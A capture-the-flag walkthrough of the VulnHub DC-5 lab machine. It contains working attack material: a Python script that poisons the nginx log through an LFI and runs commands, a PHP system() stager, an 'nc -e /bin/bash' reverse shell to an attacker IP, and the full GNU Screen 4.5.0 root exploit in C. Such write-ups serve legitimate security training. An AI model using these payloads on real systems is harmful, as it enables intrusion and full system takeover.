Preface
⏰ Date: 2023.9.1
🗺️ Target: https://www.vulnhub.com/entry/dc-5,314/
⚠️ Everything in this article was done in a lab VM; never use it against real systems without authorization.
🙏 My skills are limited; corrections are welcome, and thank you for reading!
🎉 Feel free to follow 🔍, like 👍, bookmark ⭐️ and comment 📝
Information gathering
Host discovery on the lab subnet first, then a default port scan of the new host:
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:25 HKT
Nmap scan report for bogon (192.168.58.1)
Host is up (0.00043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (192.168.58.2)
Host is up (0.00011s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for bogon (192.168.58.214)
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap 192.168.58.214
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:25 HKT
Nmap scan report for bogon (192.168.58.214)
Host is up (0.000050s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
MAC Address: 00:0C:29:65:F7:56 (VMware)
File inclusion
The site on port 80 exposes a single piece of functionality, and that one feature has a local file inclusion vulnerability (confirm it by including a known file such as /etc/passwd before building anything on it).
┌──(root㉿Erik)-[/home/eric/myfile]
└─# whatweb http://192.168.58.214
http://192.168.58.214 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.6.2], IP[192.168.58.214], Title[Welcome], nginx[1.6.2]
Getting a shell
The site runs nginx, whose access log is normally at /var/log/nginx/access.log. Make a request with a PHP one-liner in the User-Agent header so that it is written into the log, then include the log file through the LFI to execute it. Get the one-liner right the first time: nginx escapes double quotes in logged header values, so use single quotes, and a request that lands a PHP syntax error in the log breaks every subsequent include of that file.
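The poisoning step above, as an added example that is not part of the original writeup. The vulnerable page and parameter (thankyou.php?file=) are assumed stand-ins for whatever the site exposes, nginx is assumed to use its default combined log format, and the command is passed in a custom X-Cmd header (my choice, so that commands and output markers never end up in the logged request line). The access-log line in simulated_log_line is constructed.

```python
"""Added example, not from the DC-5 writeup: poisoning the nginx access log
through the LFI and reading command output back out of the included log.
Assumptions: the vulnerable page and parameter (thankyou.php?file=) are
illustrative stand-ins, nginx uses its default "combined" log format, and
the command is read from a custom header rather than the query string."""
import re
import urllib.parse
import urllib.request

TARGET = "http://192.168.58.214"          # target IP from the writeup
LFI_ENDPOINT = TARGET + "/thankyou.php"   # ASSUMED page name
LFI_PARAM = "file"                        # ASSUMED parameter name
LOG_PATH = "/var/log/nginx/access.log"

# Stager planted through the User-Agent. Single quotes only: nginx logs '"'
# and '\' as \x22 and \x5C, which would turn the stager into a PHP syntax
# error, and a syntax error in the log breaks every later include of it.
# Reading the command from a header keeps commands (and the output markers)
# out of the request line, so they are not logged next to the stager.
STAGER = "<?php system($_SERVER['HTTP_X_CMD']); ?>"
MARK = "__CMDOUT__"


def nginx_escape(value: str) -> str:
    """Model of nginx's log escaping: '"', '\\' and bytes outside 0x20-0x7e
    are written as \\xNN; everything else is copied through unchanged."""
    out = []
    for ch in value:
        if ch in '"\\' or not 0x20 <= ord(ch) < 0x7F:
            out.append("\\x%02X" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def log_safe(payload: str) -> bool:
    """True if the payload reaches the log byte-for-byte."""
    return nginx_escape(payload) == payload


def simulated_log_line(user_agent: str, src: str = "192.168.58.153") -> str:
    """Constructed combined-format log line showing what the include pulls in."""
    return (f'{src} - - [16/Aug/2023:19:30:00 +0800] "GET / HTTP/1.1" 200 612 '
            f'"-" "{nginx_escape(user_agent)}"')


def poison_request() -> urllib.request.Request:
    """One request whose User-Agent carries the stager into the log."""
    return urllib.request.Request(TARGET + "/", headers={"User-Agent": STAGER})


def lfi_url() -> str:
    """URL that includes the poisoned log through the LFI parameter."""
    return LFI_ENDPOINT + "?" + urllib.parse.urlencode({LFI_PARAM: LOG_PATH})


def command_header(cmd: str) -> dict:
    """Wrap cmd in markers so its output can be cut out of the rest of the log."""
    return {"X-Cmd": f"echo {MARK};{cmd};echo {MARK}"}


def extract_output(body: str) -> str:
    """Return the text between the two markers in the response body."""
    m = re.search(re.escape(MARK) + r"\n?(.*?)\n?" + re.escape(MARK), body, re.S)
    return m.group(1) if m else ""


def poison() -> None:
    """Plant the stager once; every later include of the log executes it."""
    urllib.request.urlopen(poison_request(), timeout=5).read()


def run(cmd: str) -> str:
    """Include the poisoned log with the command in the X-Cmd header."""
    req = urllib.request.Request(lfi_url(), headers=command_header(cmd))
    body = urllib.request.urlopen(req, timeout=5).read().decode(errors="replace")
    return extract_output(body)


if __name__ == "__main__":
    if not log_safe(STAGER):
        raise SystemExit("stager would be mangled by nginx log escaping")
    poison()
    print(run("id"))
```

Check log_safe before sending anything: a stager written with double quotes fails it, which is exactly the payload that would wedge the log.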
Privilege escalation to root
From the web shell, throw a reverse shell back to Kali with nc (a listener such as nc -lvnp 5555 must already be waiting there), then upgrade it to a pty with script:
nc -e /bin/bash 192.168.58.153 5555
script -qc bash /dev/null
Look for SUID binaries:
www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
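A small triage of the find output, added here as an example and not part of the original writeup: anything outside an expected baseline is reported with a searchsploit query built from the version baked into the file name, which is what gives /bin/screen-4.5.0 away. The baseline is an assumed short list for a minimal Debian install, not an authoritative one, and the sample input is a constructed copy of the find output above.

```python
"""Added example, not from the DC-5 writeup: triage of `find / -perm -u=s`
output. Anything outside an expected baseline is reported together with a
searchsploit query built from a version baked into the file name. The
baseline is an ASSUMED short list for a minimal Debian install, not an
authoritative one; the sample output is a constructed copy of the writeup's."""
import re

# ASSUMED baseline of SUID binaries a minimal Debian box normally ships.
BASELINE = frozenset({
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
})

# name-1.2.3 style file names: the trailing dotted number is a version.
VERSIONED = re.compile(r"^(?P<name>[A-Za-z][\w.+-]*?)-(?P<ver>\d+(?:\.\d+)+)$")

# Constructed copy of the find output from the writeup, prompt line included.
FIND_OUTPUT = """\
www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
"""


def parse_find(output: str) -> list:
    """Keep the absolute paths, drop the prompt line and blanks."""
    return [ln.strip() for ln in output.splitlines() if ln.strip().startswith("/")]


def split_version(path: str) -> tuple:
    """'/bin/screen-4.5.0' -> ('screen', '4.5.0'); '/bin/su' -> ('su', None)."""
    base = path.rsplit("/", 1)[-1]
    m = VERSIONED.match(base)
    return (m.group("name"), m.group("ver")) if m else (base, None)


def triage(output: str, baseline=BASELINE) -> list:
    """Unexpected SUID files as (path, searchsploit query) pairs."""
    hits = []
    for path in parse_find(output):
        if path in baseline:
            continue
        name, ver = split_version(path)
        hits.append((path, f"{name} {ver}" if ver else name))
    return hits


if __name__ == "__main__":
    for path, query in triage(FIND_OUTPUT):
        print(f"{path:<30} searchsploit {query}")
```

A binary that is not in the baseline but has no version in its name still gets reported, with just its name as the query; the version is a bonus, not a requirement.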
The screen binary carries its version in the file name, 4.5.0, so search for that version:
┌──(root㉿Erik)-[~eric/myfile]
└─# searchsploit screen 4.5.0
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Following the steps in 41154.sh. The bug (CVE-2017-5618) is that screen 4.5.0 is setuid root and opens its -L logfile with root privileges without dropping them, so an unprivileged user can make it create a root-owned /etc/ld.so.preload; the next setuid program to run (screen -ls) then preloads our library as root, and its constructor turns /tmp/rootshell into a setuid-root binary. The PoC's C sources below have their missing headers added and the execvp call corrected to its real two-argument form (the original only compiled because the prototype was never included); the commands are otherwise as in the PoC.
cat << 'EOF' > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* Runs as root when ld.so preloads this library into the setuid screen. */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");   /* remove the preload so nothing else loads us */
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
cat << 'EOF' > /tmp/rootshell.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    char *const argv[] = {"/bin/sh", NULL};
    execvp("/bin/sh", argv);   /* execvp(file, argv): the PoC's third argument was a bug */
    return 1;
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
That gives a root shell; grab the flag.